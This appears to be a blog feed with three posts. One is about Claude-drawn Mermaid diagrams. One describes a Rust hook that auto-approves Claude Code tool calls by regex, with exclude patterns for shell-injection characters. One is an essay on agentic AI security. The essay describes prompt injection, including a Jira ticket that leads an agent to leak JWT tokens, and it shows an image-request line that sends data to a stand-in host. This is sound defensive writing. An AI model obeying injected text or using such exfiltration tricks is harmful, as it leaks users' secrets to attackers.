being non-deterministic, every time you get a different diagram: --- config: theme: base themeVariables: primaryColor: '#e0f2fe' primaryTextColor: '#0c4a6e' primaryBorderColor: '#0369a1' lineColor: '#64748b' fontSize: 14px --- graph TB %% Define actors nicholson["Jack Nicholson&lt;br/&gt;(McMurphy)"] fletcher["Louise Fletcher&lt;br/&gt;(Nurse Ratched)"] devito["Danny DeVito&lt;br/&gt;(Martini)"] lloyd["Christopher Lloyd&lt;br/&gt;(Max Taber)"] dourif["Brad Dourif&lt;br/&gt;(Billy Bibbit)"] sampson["Will Sampson&lt;br/&gt;(Chief Bromden)"] crothers["Scatman Crothers&lt;br/&gt;(Turkel)"] %% Define invisible subgraph for central cluster subgraph main[" "] nicholson devito lloyd crothers end subgraph side[" "] fletcher dourif sampson end %% Strong connections (4 films) nicholson ---|"4 films (1972-1980)"| crothers %% Medium-strong connections (3 collaborations) nicholson ---|"3 films including Terms of Endearment"| devito devito ---|"3 projects including Taxi TV"| lloyd %% Medium connections (2 films) nicholson ---|"2 films including Goin South"| lloyd %% Single film connections (OFOTCN only) nicholson ---|"OFOTCN only"| fletcher nicholson ---|"OFOTCN only"| dourif nicholson ---|"OFOTCN only"| sampson %% Apply invisible style classDef invisible fill:#0000,stroke:#0000; class main,side invisible; %% Style definitions classDef central fill:#3b82f6,stroke:#1e40af,color:#fff,stroke-width:3px; classDef supporting fill:#60a5fa,stroke:#2563eb,color:#fff,stroke-width:2px; classDef peripheral fill:#93c5fd,stroke:#3b82f6,color:#1e3a8a,stroke-width:2px; %% Apply styles class nicholson central; class devito,lloyd,crothers supporting; class fletcher,dourif,sampson peripheral; %% Style edges by strength linkStyle 0 stroke:#15803d,stroke-width:6px; linkStyle 1 stroke:#16a34a,stroke-width:4px; linkStyle 2 stroke:#16a34a,stroke-width:4px; linkStyle 3 stroke:#22c55e,stroke-width:3px; linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1px,stroke-dasharray:5 5; I didn’t like this so I asked: the diagram is still a bit ugly - can you clear it up and make it look nicer? and got: --- config: theme: base themeVariables: fontSize: 16px --- graph LR %% Define actors with stadium shape for central hub nicholson(["Jack Nicholson&lt;br/&gt;McMurphy"]) %% Supporting actors with rounded rectangles devito["Danny DeVito&lt;br/&gt;Martini"] lloyd["Christopher Lloyd&lt;br/&gt;Max Taber"] crothers["Scatman Crothers&lt;br/&gt;Turkel"] %% Peripheral actors fletcher["Louise Fletcher&lt;br/&gt;Nurse Ratched"] dourif["Brad Dourif&lt;br/&gt;Billy Bibbit"] sampson["Will Sampson&lt;br/&gt;Chief Bromden"] %% Layout using invisible subgraphs subgraph left[" "] fletcher dourif sampson end subgraph center[" "] nicholson end subgraph right[" "] crothers devito lloyd end %% Connections - strongest first nicholson ---|"4 films (1972-1980)"| crothers nicholson ---|"3 films including Terms of Endearment"| devito devito ---|"3 projects including Taxi TV"| lloyd nicholson ---|"2 films including Goin South"| lloyd %% Single film connections nicholson ---|"OFOTCN only"| fletcher nicholson ---|"OFOTCN only"| dourif nicholson ---|"OFOTCN only"| sampson %% Apply invisible style to subgraphs classDef invisible fill:#0000,stroke:#0000; class left,center,right invisible; %% Style definitions - warm sophisticated palette classDef hub fill:#f59e0b,stroke:#d97706,color:#fff,stroke-width:4px,rx:20,ry:20; classDef inner fill:#3b82f6,stroke:#2563eb,color:#fff,stroke-width:3px,rx:10,ry:10; classDef outer fill:#e0e7ff,stroke:#818cf8,color:#1e1b4b,stroke-width:2px,rx:10,ry:10; %% Apply styles class nicholson hub; class crothers,devito,lloyd inner; class fletcher,dourif,sampson outer; %% Style edges with color gradient by strength linkStyle 0 stroke:#dc2626,stroke-width:7px; linkStyle 1 stroke:#ea580c,stroke-width:5px; linkStyle 2 stroke:#ea580c,stroke-width:5px; linkStyle 3 stroke:#f59e0b,stroke-width:4px; linkStyle 4,5,6 stroke:#94a3b8,stroke-width:1.5px,stroke-dasharray:4 4; For a real problem I tend to iterate a lot - “Can you group these things together?” or “Can you change the colour of X to something more blue-green?” - but it’s quite straightforward. Note, by the way, that this is a fun example of using agents but not a huge improvement. I find myself going back to the non-agentic version for tweaking - it uses more context, but it also knows a lot more about the image produced - the agentic version has to turn the image to a text description, which means it loses a bit of information along the way. But for generating a lot of diagrams quickly, it’s great - especially when I’m documenting a whole project, I just want diagrams that work and want them quickly. There is one slight hassle - permissions. Claude will prompt you over and over again “Do you want to run npx -p @mermaid-js/mermaid-cli@latest mmdc -s 3 -i ...?” - in theory you can set Bash permissions with wildcards but in my experience it just doesn’t work, except for very simple exact matches. Even giving it permissions Bash(rm /tmp/mermaid:*) doesn’t work - I get asked for every single file removal. I don’t mind Claude being cautious here - but it is very tedious that it asks ever single time. So I built a workaround - using their suggestion Additional permission control with hooks - which I’ll document in the next post! I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people) This secret agent mermaid was generated by Claude, inspired by Simon Willison’s pelican on a bicycle LLM benchmark. &#8617;]]></summary></entry><entry><title type="html">Better Claude Code permissions</title><link href="https://blog.korny.info/2025/10/10/better-claude-code-permissions" rel="alternate" type="text/html" title="Better Claude Code permissions" /><published>2025-10-10T00:00:00+01:00</published><updated>2025-10-10T00:00:00+01:00</updated><id>https://blog.korny.info/2025/10/10/better-claude-code-permissions</id><content type="html" xml:base="https://blog.korny.info/2025/10/10/better-claude-code-permissions"><![CDATA[<p>This is a short post (two in one day!) to talk about a new tool I’ve written to help with Claude Code permissions.</p>

<p><em>Note</em> see also my standard <a href="/ai-disclaimer/">AI Disclaimer</a></p>

<h2 id="the-problem-with-permissions">The problem with permissions</h2>

<p>In <a href="/2025/10/10/agent-mermaid-reporting-for-duty/">my previous post</a> I mentioned a frustrating issue with Claude Code - it kept asking me to approve the same commands over and over again. The <a href="https://docs.claude.com/en/docs/claude-code/iam#tool-specific-permission-rules">documentation says you can use wildcards in permissions</a> but in practice, even simple patterns don’t work reliably. I’d give it permissions like <code class="language-plaintext highlighter-rouge">Bash(rm /tmp/mermaid:*)</code> and it would <em>still</em> ask me every single time it wanted to delete a temporary mermaid file.</p>

<h2 id="the-solution-hooks">The solution: hooks</h2>

<p>Fortunately, Claude Code has an alternative approach: <a href="https://docs.claude.com/en/docs/claude-code/iam#additional-permission-control-with-hooks">hooks</a>. You can write a script that runs before every tool use, and that script can approve or deny the operation. This is exactly what I needed - a way to say “yes, Claude can run mermaid-cli commands without asking me every time” without dangerously-skip-permissions or any such foolishness.</p>

<p>So I threw together <a href="https://github.com/kornysietsma/claude-code-permissions-hook">claude-code-permissions-hook</a>, a configurable permission handler that uses regular expressions to allow or deny tool usage.</p>

<h2 id="why-rust">Why Rust?</h2>

<p>I could have written this in Python or JavaScript or any scripting language. But I chose Rust for three reasons:</p>

<p>First, performance. Yes, premature optimisation is the root of a lot of evil. For almost all my AI stuff I’m using Python, it is simple, expressive, and <a href="https://docs.astral.sh/uv/guides/scripts/">you can build it into a single executable script using uv</a>, which is great for quick things. But - this hook runs <em>on every single tool use</em>. Rust compiles to fast binaries with no startup cost.</p>

<p>Second, Rust is fun - I really enjoy using it, it’s fast, modern, has great tooling. It can get complex when you do complex things - async coding or dealing with mutable state - but for a simple cli tool it is great. <a href="https://github.com/kornysietsma/claude-code-permissions-hook/blob/main/src/main.rs">Take a look at some code - it’s not <em>that</em> complex, even vibe-coded code!</a></p>

<p>And thirdly, Rust is a good language for an agentic LLM tool. I’ve seen suggestions in the past that LLMs struggled with Rust, due to its newness and complexity, but so far I haven’t had that problem; admittedly I haven’t done anything complicated. But the advantage of a strict type system, explicit error handling, and built in linting and hints and tests, make it easy for a tool like Claude Code to iterate until it gets something semi-decent.</p>

<p>Claude Code vibe-coded 95% of this tool, with a fairly short prompt and only a few hints - I think it took me longer to write this blog post!  (Note that when I say “vibe coded” - I still checked every line before committing anything - I don’t trust the AIs <em>that</em> much)</p>

<h2 id="how-it-works">How it works</h2>

<p>The hook is quite simple:</p>

<ol>
  <li>Every time Claude Code plans to call a tool, it looks through its configuration for a <code class="language-plaintext highlighter-rouge">PreToolUse</code> entry that matches the tool, and sees that it should call <code class="language-plaintext highlighter-rouge">claude-code-permissions-hook</code></li>
  <li>Claude Code sends a JSON payload describing the tool it wants to use</li>
  <li>The hook loads a TOML configuration file with allow/deny rules and logging settings</li>
  <li>It checks deny rules first (these take precedence)</li>
  <li>Then it checks allow rules</li>
  <li>If something matches, it outputs an allow or deny decision</li>
  <li>If nothing matches, it outputs nothing (which means Claude’s normal permissions apply)</li>
  <li>Logging rules are checked - even with no matches, verbose logging kicks in so you can diagnose stuff</li>
</ol>

<p>Here’s the configuration I use for running the Mermaid agent:</p>

<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Allow npx mermaid-cli mmdc commands (but exclude pipes, background jobs, etc.)</span>
<span class="nn">[[allow]]</span>
<span class="py">tool</span> <span class="p">=</span> <span class="s">"Bash"</span>
<span class="py">command_regex</span> <span class="p">=</span> <span class="s">"^npx -p @mermaid-js/mermaid-cli(@latest)? mmdc "</span>
<span class="py">command_exclude_regex</span> <span class="p">=</span> <span class="s">"&amp;|;|</span><span class="se">\\</span><span class="s">||`"</span>

<span class="c"># Allow reading files in /tmp/mermaid-test-automation (but exclude parent navigation)</span>
<span class="nn">[[allow]]</span>
<span class="py">tool</span> <span class="p">=</span> <span class="s">"Read"</span>
<span class="py">file_path_regex</span> <span class="p">=</span> <span class="s">"^/tmp/mermaid-test-automation"</span>
<span class="py">file_path_exclude_regex</span> <span class="p">=</span> <span class="s">"</span><span class="se">\\</span><span class="s">.</span><span class="se">\\</span><span class="s">."</span>

<span class="c"># Allow rm commands for mermaid test files (with or without -f)</span>
<span class="nn">[[allow]]</span>
<span class="py">tool</span> <span class="p">=</span> <span class="s">"Bash"</span>
<span class="py">command_regex</span> <span class="p">=</span> <span class="s">"^rm (-f )?/tmp/mermaid-test-automation"</span>
<span class="py">command_exclude_regex</span> <span class="p">=</span> <span class="s">"&amp;|;|</span><span class="se">\\</span><span class="s">||`|</span><span class="se">\\</span><span class="s">$</span><span class="se">\\</span><span class="s">(|</span><span class="se">\\</span><span class="s">.</span><span class="se">\\</span><span class="s">."</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">exclude_regex</code> is handy - you can write “allow this pattern, but not if it also matches this other pattern” which makes it easier to write rules like “allow cargo commands, but not if they contain shell injection characters”.</p>

<p>I won’t go into too much detail here - the <a href="https://github.com/kornysietsma/claude-code-permissions-hook">README on GitHub</a> covers installation and configuration.</p>

<h2 id="caveats">Caveats</h2>

<p>This is very much a “just solve an immediate problem” tool. I haven’t packaged it up nicely, there’s no installer, you need to build it yourself with <code class="language-plaintext highlighter-rouge">cargo build --release</code>. No warranty is provided! I suspect the tool may be short-lived, Anthropic will probably fix their permissions and then I’ll need this much less - though it’s handy to be able to add my own specific bypasses here!</p>

<h2 id="does-it-work">Does it work?</h2>

<p>Absolutely. I can now draw mermaid diagrams without drowning in permission prompts. I can log what tools I use, and change tweaks as I want. And, I can configure exactly what Claude can and can’t do - I could see extending this to be more specific if I need to; it’s just code.</p>

<p>And I got to write some Rust, which is always fun.</p>

<p>If you’re having similar frustrations with Claude Code permissions, <a href="https://github.com/kornysietsma/claude-code-permissions-hook">give it a try</a>. If you’re not comfortable building Rust code, you could easily take the ideas here and implement them in your language of choice - the concepts are pretty simple.</p>

<hr />

<p>I’ve given up on Discus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115395530660357132">My post on Mastodon</a> or <a href="https://bsky.app/profile/korny.sietsma.com/post/3m3hx2gfjb22z">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="Development" /><category term="claude-code" /><category term="permissions" /><category term="rust" /><summary type="html"><![CDATA[This is a short post (two in one day!) to talk about a new tool I’ve written to help with Claude Code permissions. Note see also my standard AI Disclaimer The problem with permissions In my previous post I mentioned a frustrating issue with Claude Code - it kept asking me to approve the same commands over and over again. The documentation says you can use wildcards in permissions but in practice, even simple patterns don’t work reliably. I’d give it permissions like Bash(rm /tmp/mermaid:*) and it would still ask me every single time it wanted to delete a temporary mermaid file. The solution: hooks Fortunately, Claude Code has an alternative approach: hooks. You can write a script that runs before every tool use, and that script can approve or deny the operation. This is exactly what I needed - a way to say “yes, Claude can run mermaid-cli commands without asking me every time” without dangerously-skip-permissions or any such foolishness. So I threw together claude-code-permissions-hook, a configurable permission handler that uses regular expressions to allow or deny tool usage. Why Rust? I could have written this in Python or JavaScript or any scripting language. But I chose Rust for three reasons: First, performance. Yes, premature optimisation is the root of a lot of evil. For almost all my AI stuff I’m using Python, it is simple, expressive, and you can build it into a single executable script using uv, which is great for quick things. But - this hook runs on every single tool use. Rust compiles to fast binaries with no startup cost. Second, Rust is fun - I really enjoy using it, it’s fast, modern, has great tooling. It can get complex when you do complex things - async coding or dealing with mutable state - but for a simple cli tool it is great. Take a look at some code - it’s not that complex, even vibe-coded code! And thirdly, Rust is a good language for an agentic LLM tool. I’ve seen suggestions in the past that LLMs struggled with Rust, due to its newness and complexity, but so far I haven’t had that problem; admittedly I haven’t done anything complicated. But the advantage of a strict type system, explicit error handling, and built in linting and hints and tests, make it easy for a tool like Claude Code to iterate until it gets something semi-decent. Claude Code vibe-coded 95% of this tool, with a fairly short prompt and only a few hints - I think it took me longer to write this blog post! (Note that when I say “vibe coded” - I still checked every line before committing anything - I don’t trust the AIs that much) How it works The hook is quite simple: Every time Claude Code plans to call a tool, it looks through its configuration for a PreToolUse entry that matches the tool, and sees that it should call claude-code-permissions-hook Claude Code sends a JSON payload describing the tool it wants to use The hook loads a TOML configuration file with allow/deny rules and logging settings It checks deny rules first (these take precedence) Then it checks allow rules If something matches, it outputs an allow or deny decision If nothing matches, it outputs nothing (which means Claude’s normal permissions apply) Logging rules are checked - even with no matches, verbose logging kicks in so you can diagnose stuff Here’s the configuration I use for running the Mermaid agent: # Allow npx mermaid-cli mmdc commands (but exclude pipes, background jobs, etc.) [[allow]] tool = "Bash" command_regex = "^npx -p @mermaid-js/mermaid-cli(@latest)? mmdc " command_exclude_regex = "&amp;|;|\\||`" # Allow reading files in /tmp/mermaid-test-automation (but exclude parent navigation) [[allow]] tool = "Read" file_path_regex = "^/tmp/mermaid-test-automation" file_path_exclude_regex = "\\.\\." # Allow rm commands for mermaid test files (with or without -f) [[allow]] tool = "Bash" command_regex = "^rm (-f )?/tmp/mermaid-test-automation" command_exclude_regex = "&amp;|;|\\||`|\\$\\(|\\.\\." The exclude_regex is handy - you can write “allow this pattern, but not if it also matches this other pattern” which makes it easier to write rules like “allow cargo commands, but not if they contain shell injection characters”. I won’t go into too much detail here - the README on GitHub covers installation and configuration. Caveats This is very much a “just solve an immediate problem” tool. I haven’t packaged it up nicely, there’s no installer, you need to build it yourself with cargo build --release. No warranty is provided! I suspect the tool may be short-lived, Anthropic will probably fix their permissions and then I’ll need this much less - though it’s handy to be able to add my own specific bypasses here! Does it work? Absolutely. I can now draw mermaid diagrams without drowning in permission prompts. I can log what tools I use, and change tweaks as I want. And, I can configure exactly what Claude can and can’t do - I could see extending this to be more specific if I need to; it’s just code. And I got to write some Rust, which is always fun. If you’re having similar frustrations with Claude Code permissions, give it a try. If you’re not comfortable building Rust code, you could easily take the ideas here and implement them in your language of choice - the concepts are pretty simple. I’ve given up on Discus for comments - if you want to discuss this post, please reply to My post on Mastodon or My post on Bluesky (I’m doing both as one is more free, one is more convenient for many people)]]></summary></entry><entry><title type="html">Agentic AI and Security</title><link href="https://blog.korny.info/2025/09/12/agentic-ai-and-security" rel="alternate" type="text/html" title="Agentic AI and Security" /><published>2025-09-12T00:00:00+01:00</published><updated>2025-09-12T00:00:00+01:00</updated><id>https://blog.korny.info/2025/09/12/agentic-ai-and-security</id><content type="html" xml:base="https://blog.korny.info/2025/09/12/agentic-ai-and-security"><![CDATA[<p class="notice--success">An expanded version of this post has been published at <a href="https://martinfowler.com/articles/agentic-ai-security.html">https://martinfowler.com/articles/agentic-ai-security.html</a> - with more mitigations and updated content - I’d suggest reading that article instead, I’m leaving this one up for posterity.</p>

<p>Also I’ve given up on Discus for comments - if you want to discuss this post, please reply to <a href="https://hachyderm.io/@Korny/115451903530308404">My post on Mastodon</a> or <a href="https://bsky.app/profile/did:plc:bdphvffyy3x2lf5foeogab6u/post/3m4ay3wsjls26">My post on Bluesky</a> (I’m doing both as one is more free, one is more convenient for many people)</p>

<hr />

<p>This is an edited version of a post I wrote for the <a href="https://www.liberis.com">Liberis</a> internal engineering blog - it is not particularly original, most of the ideas come directly from <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison’s article “Lethal Trifecta for AI agents”</a> - but I thought it was worth writing a summary for our engineers, and sharing it more widely.</p>

<hr />

<p>Bruce Schneier summarised the current Agentic AI situation <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html">in his blog</a>:</p>

<blockquote>
  <p>We simply don’t know how to defend against these attacks. We have zero agentic AI systems that are secure against these attacks. Any AI that is working in an adversarial environment—and by this I mean that it may encounter untrusted training data or input—is vulnerable to prompt injection. It’s an existential problem that, near as I can tell, most people developing these technologies are just pretending isn’t there.</p>
</blockquote>

<p>There are many risks in this area, and it is in a state of rapid change - we need to understand the risks, keep an eye on them, and work out how to mitigate them where we can.</p>

<p>(I’m going to shamelessly plagiarise <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison’s excellent “Lethal Trifecta for AI agents”</a> article as it is an excellent overview of the risks.)</p>

<h2 id="what-do-we-mean-by-agentic-ai">What do we mean by Agentic AI</h2>

<p>The terminology is in flux so terms are hard to pin down. I’m using “Agentic AI” with the specific meaning “LLM-based tools that can act autonomously” - tools that extend the basic LLM model with tools and agents and background processes. Increasingly this means “almost all AI based tools” - especially coding tools like Cursor, Copilot or Claude Code. (Note I’m using ‘agent’ here for any kind of tooling - some places reserve ‘agent’ for specific kinds of autonomous background agents, but that’s beyond this article)</p>

<p>It helps to clarify the architecture and how these tools work:</p>

<h3 id="basic-architecture">Basic architecture</h3>

<p>A simple non-agentic LLM just processes text - very very cleverly, but it’s still text-in and text-out:</p>

<pre><code class="language-mermaid">flowchart TD
    prompt@{shape: doc, label: "User Prompt"}
    output@{shape: doc, label: "Text Output"}
    
    subgraph llm["LLM"]
        context[System Context]
        training[Training Data]
    end
    
    prompt --&gt; llm
    llm --&gt; output
</code></pre>

<p>Classic ChatGPT worked like this, but more and more tools are extending this with agents</p>

<h3 id="agentic-architecture">Agentic architecture</h3>

<p>An agentic LLM does more. It reads from a lot more sources of data, and it can trigger activities with side effects:</p>

<pre><code class="language-mermaid">flowchart TD
    prompt@{shape: doc, label: "User Prompt"}
    response@{shape: doc, label: "Text Response"}
    
    subgraph llm["Agentic LLM"]
        context[System Context]
        training[Training Data]
        sessioncontext@{shape: doc, label: "Session Context"}
    end
    
    read@{shape: lean-r, label: "Read Actions&lt;br/&gt;• Browse Web&lt;br/&gt;• Read Code&lt;br/&gt;• MCP Servers&lt;br/&gt;"}
    write@{shape: subroutine, label: "Write Actions&lt;br/&gt;• Modify files&lt;br/&gt;• HTTP calls&lt;br/&gt;• Shell commands&lt;br/&gt;• MCP Servers&lt;br/&gt;"}
    external@{ shape: docs, label: "External"}

    prompt --&gt; llm
    llm -.-&gt;|query| read
    read -.-&gt;|response added to context| llm
    llm -.-&gt;|execute| write
    write -.-&gt;|response added to context| llm
    llm --&gt; response
    write -.-&gt;|write| external
</code></pre>

<p>Some of these agents are triggered explicitly by the user - but many are built in. For example coding tools will read your project source code and configuration, usually without informing you. And as the tools get smarter they have more and more agents under the covers.</p>

<h3 id="what-is-an-mcp-server">What is an MCP server?</h3>

<p>An <a href="https://en.wikipedia.org/wiki/Model_Context_Protocol">MCP server</a> really can be anything. MCP is an open standardised protocol to make it easier for an AI tool to call a service. That service might just be a local script that reads files, it might be a public cloud-based service that can read, write, perform actions, run background agents, pretty much do anything - it’s a very flexible protocol.</p>

<p>MCP servers come with their own risks, as they don’t always come from large trusted vendors like Anthropic - the boom in AI coding means there is also a boom in people building tools, not always with the best quality control. On top of more general security issues discussed below, just calling an MCP server that has a flaw puts you at risk - all the usual rules about using 3rd party tools should apply.</p>

<h2 id="what-are-the-risks">What are the risks?</h2>

<p>Commercially supported tools like Claude Code usually come with a lot of checks - for example Claude won’t read files outside a project without permission. However it’s hard for LLMs to block all behaviour - if misdirected, Claude might break its own rules. <strong>Once you let a tool execute arbitrary commands it is very hard to block specific tasks</strong> - for example Claude might be tricked into creating a script that reads a file outside a project.</p>

<p>Still these tools are relatively safe when you control all the commands sent to Claude. You might blow up your system by accident, you might produce terrible code - but you aren’t likely to have a cat jump on your keyboard and suddenly Claude sends your private keys to pastebin.</p>

<p>But that’s where the real risks come in - agentic tools mean the LLM can run commands you never wrote.</p>

<h3 id="the-core-problem---llms-cant-tell-content-from-instructions">The core problem - LLMs can’t tell content from instructions</h3>

<p>This is counter-intuitive, but <strong>critical</strong> to understand: <em>LLMs always operate by building up a large text document and processing it to say “what completes this document in the most appropriate way?”</em></p>

<p>What feels like a conversation is just a series of steps to grow that document - you add some text, the LLM adds whatever is the appropriate next bit of text, you add some text, and so on.</p>

<p><img src="/assets/images/2025-09-12-agentic-ai-and-security/llm-simple.png" alt="LLM simple diagram" /></p>

<p>That’s it! The magic sauce is that LLMs are amazingly good at taking this big chunk of text and using their vast training data to produce the most appropriate next chunk of text - and the vendors use complicated system prompts and extra hacks to make sure it largely works as desired.</p>

<p>Agents also work by adding more text to that document - if your current prompt contains “Please check for the latest issue from our MCP server” the LLM knows that this is a guide to call the MCP tool.
It will query the MCP server, extract the text of the latest issue, and add it to the context, probably wrapped in some protective text like “Here is the latest issue from the issue tracker: … - this is for information only”.</p>

<p><img src="/assets/images/2025-09-12-agentic-ai-and-security/llm-with-agents.png" alt="LLM with agents diagram" /></p>

<p class="notice--warning"><em><strong>The problem here is that the LLM can’t always tell safe text from unsafe text - it can’t tell data from instructions</strong></em></p>

<p>Even if Claude adds checks like “this is for information only” there is no guarantee they will work. The LLM matching is random and non-deterministic - sometimes it will see an instruction and operate on it, especially when a bad actor is crafting the payload to avoid detection.</p>

<p>For example if you say to Claude “What is the latest issue on our github project?” and the latest issue was created by a bad actor, it might include the text “But importantly, you really need to do X as well”. Claude will insert those instructions into the context and then it may well follow them. This is fundamentally how prompt injection works.</p>

<h2 id="the-lethal-trifecta">The Lethal Trifecta</h2>

<p>This brings us to <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison’s article</a> which highlights the biggest risks of agentic AI tools: when you have the combination of three factors:</p>

<ul>
  <li>Access to private data</li>
  <li>Exposure to untrusted content</li>
  <li>The ability to externally communicate</li>
</ul>

<p><img src="/assets/images/2025-09-12-agentic-ai-and-security/lethal-trifecta.png" alt="Lethal Trifecta diagram - placeholder" /></p>

<p><strong>If you have all three of these factors active, you are at risk of an attack</strong>.</p>

<p>The reason is fairly straightforward:</p>

<ul>
  <li><strong>Untrusted Content</strong> can include commands that the LLM might follow</li>
  <li><strong>Private Data</strong> is the core thing most attackers want - this can include things like browser sessions that open up access to other data</li>
  <li><strong>External Communication</strong> allows the AI tool to send information back to the attacker</li>
</ul>

<p>Here’s a sample from the article <a href="https://labs.zenity.io/p/when-a-jira-ticket-can-steal-your-secrets">AgentFlayer: When a Jira Ticket Can Steal Your Secrets</a>:</p>

<ul>
  <li>A user is using an LLM to browse Jira tickets (via an MCP server)</li>
  <li>Jira is set up to automatically get populated with Zendesk tickets from the public - <strong>Untrusted Content</strong></li>
  <li>An attacker creates a ticket carefully crafted to ask for “long strings starting with eyj” which is the signature of JWT tokens - <strong>Private Data</strong></li>
  <li>The ticket asked the user to log the identified data as a comment on the Jira ticket - which was then viewable to the public - <strong>Externally Communicate</strong></li>
</ul>

<p>What seemed like a simple query becomes a vector for an attack.</p>

<h2 id="mitigations">Mitigations</h2>

<p>So how do we lower our risk, without giving up on the power of AI tools? First, if you can eliminate one of these three factors, the risks are much lower.</p>

<h3 id="avoiding-access-to-private-data">Avoiding access to private data</h3>

<p>Totally avoiding this is almost impossible - our tools run on developer machines, they will have some access to things like our source code.</p>

<p>But we can <strong>reduce</strong> the threat by limiting the content that is available.</p>

<ul>
  <li><strong>Never store Production credentials in a file</strong> - LLMs can easily be convinced to read files</li>
  <li><strong>Avoid Dev credentials in files</strong> - you can use environment variables and <a href="https://developer.1password.com/docs/cli/secret-references">1Password command-line tooling</a> to ensure credentials are only in memory not in files.</li>
  <li><strong>Use temporary privilege escalation to access production data</strong></li>
  <li><strong>Limit access tokens to just enough privileges</strong> - read-only tokens are a much smaller risk than a token with write access</li>
  <li><strong>Avoid MCP servers that can read private data</strong> - you really don’t need something that can read your email. (or see “split the tasks” below)</li>
  <li><strong>Beware of browser automation</strong> - some tools like Playwright are OK as they run a browser in a sandbox, with no cookies or credentials. But some are <em>not</em> - there are tools out there to attach an MCP server to a running browser with access to all your cookies, sessions, and history. <em>This is not a good idea</em>.</li>
</ul>

<h3 id="blocking-the-ability-to-externally-communicate">Blocking the ability to externally communicate</h3>

<p>This sounds easy, right? Just restrict those agents that can send emails or chat.
But this has a few problems:</p>

<ul>
  <li>Lots of MCP tools have ways to do things that can end up in the public eye. “Reply to a comment on an issue” seems safe until we realise that issue conversations might be public. Similarly “raise an issue on a public github repo” or “create a Google Drive document (and then make it public)”</li>
  <li>Web access is a big one. If you can control a browser, you can post information to a public site. But it gets worse - if you <em>open an image</em> with a carefully crafted URL, you might send data to an attacker. <code class="language-plaintext highlighter-rouge">GET https://foobar.net/foo.png?var=[data]</code> looks like an image request but that data can be logged by the foobar.net server.</li>
</ul>

<p>There are so many of these attacks, <a href="https://simonwillison.net/tags/exfiltration-attacks/">Simon Willison has an entire category of his site dedicated to exfiltration attacks</a></p>

<p>Vendors like Anthropic are working hard to lock these down, but it’s pretty much whack-a-mole.</p>

<h3 id="limiting-access-to-untrusted-content">Limiting access to untrusted content</h3>

<p class="notice--info">This is probably the best category for limiting our risk.</p>

<p><strong>You should avoid reading content that can be written by the general public</strong> - don’t read public issue trackers, don’t read arbitrary web pages, don’t let an LLM read your email or public chats!</p>

<p>Obviously <em>some</em> content is unavoidable - you can ask an LLM to summarise a web page, and you are <em>probably</em> safe from that web page having hidden instructions in the text. Probably. But probably better to stick to “Please search on docs.microsoft.com” than “Please read the latest comments on reddit”. Or keep the task that reads Reddit separate from other tasks - see “Split the tasks” below.</p>

<h3 id="beware-tools-that-violate-all-three-of-these">Beware tools that violate all three of these!</h3>

<p>It feels worth highlighting the worst kind of tools - MCP servers (or CLI tools) that both access untrusted content <em>and</em> externally communicate <em>and</em> access private data.</p>

<p class="notice--danger">Some popular tools are a massive risk and should be avoided or only run in isolated containers</p>

<p>A clear example of this is AI powered browsers, or browser extensions - anywhere you can use a browser <em>that can use your credentials or sessions or cookies</em> you are wide open:</p>

<ol>
  <li>Private data is exposed by any credentials you provide</li>
  <li>External communication is unavoidable - a GET to an image can expose your data</li>
  <li>Untrusted content is also pretty much unavoidable</li>
</ol>

<p>Simon Willison (again!) <a href="https://simonwillison.net/2025/Aug/25/agentic-browser-security/">has a good coverage of this issue</a> after a report on the Comet “AI Browser”.</p>

<p>You should only use these tools if you can run them in a completely unauthenticated way - Microsoft’s <a href="github.com/microsoft/playwright-mcp">Playwright MCP server</a> is a good counter-example as it runs in an isolated browser instance. But don’t use their browser extension!</p>

<blockquote>
  <p>I strongly expect that the <em>entire concept</em> of an agentic browser extension is fatally flawed and cannot be built safely. - Simon Willison</p>
</blockquote>

<h3 id="split-the-tasks">Split the tasks</h3>

<p>A key point of the Lethal Trifecta is that it’s worst when all three factors exist.
So you can mitigate risks by - splitting up the work into stages where each stage is safer.</p>

<p>For instance, you might want to research how to fix a kafka problem - and yes, you might need to access reddit. So run this as a multi-stage research project:</p>

<ol>
  <li>Identify the problem - ask the LLM to examine the codebase, examine official docs, identify the possible issues. Get it to craft a <code class="language-plaintext highlighter-rouge">research-plan.md</code> document describing what information it needs.
    <ul>
      <li>Read the <code class="language-plaintext highlighter-rouge">research-plan.md</code> to check it makes sense!</li>
    </ul>
  </li>
  <li>In a new session, run the research plan - this can be run without the same tool access, it could even be a standalone agent with access to only web searches. Get it to generate <code class="language-plaintext highlighter-rouge">research-results.md</code>
    <ul>
      <li>Read the <code class="language-plaintext highlighter-rouge">research-results.md</code> to make sure it makes sense!</li>
    </ul>
  </li>
  <li>Now back in the codebase, ask the LLM to use the research results to work on a fix.</li>
</ol>

<p>This is not only more secure, it is also increasingly a way people are encouraged to work. It’s too big a topic to cover here, but it’s a good idea to split LLM work into small stages, as the LLM works much better when its context isn’t too big. Dividing your tasks into “Think, Plan, Act” keeps context down, especially if “Act” can be chunked into a number of small independent and testable chunks.</p>

<p>Also this follows another key recommendation: “<strong>Keep a human in the loop</strong>”</p>

<h3 id="keep-a-human-in-the-loop">Keep a human in the loop</h3>

<p>AIs make mistakes, they hallucinate, they can easily produce slop and technical debt. And as we’ve seen, they can be used for attacks.</p>

<p>It is <em>ALWAYS</em> a good idea to check what they are doing. Either run them interactively, and watch them and approve as they work - or if running in the background, monitor their output carefully and make sure you are there to prune, to remove junk, to course-correct. If you are writing code, best practice is to have all code reviewed before it hits production - and those reviewers need to be human eyes.</p>

<p>Having a human in the loop allows us to catch problems earlier, and to produce better results, as well as helping be more secure.</p>

<h2 id="other-risks">Other risks</h2>

<h3 id="hosted-mcp-servers">Hosted MCP servers</h3>

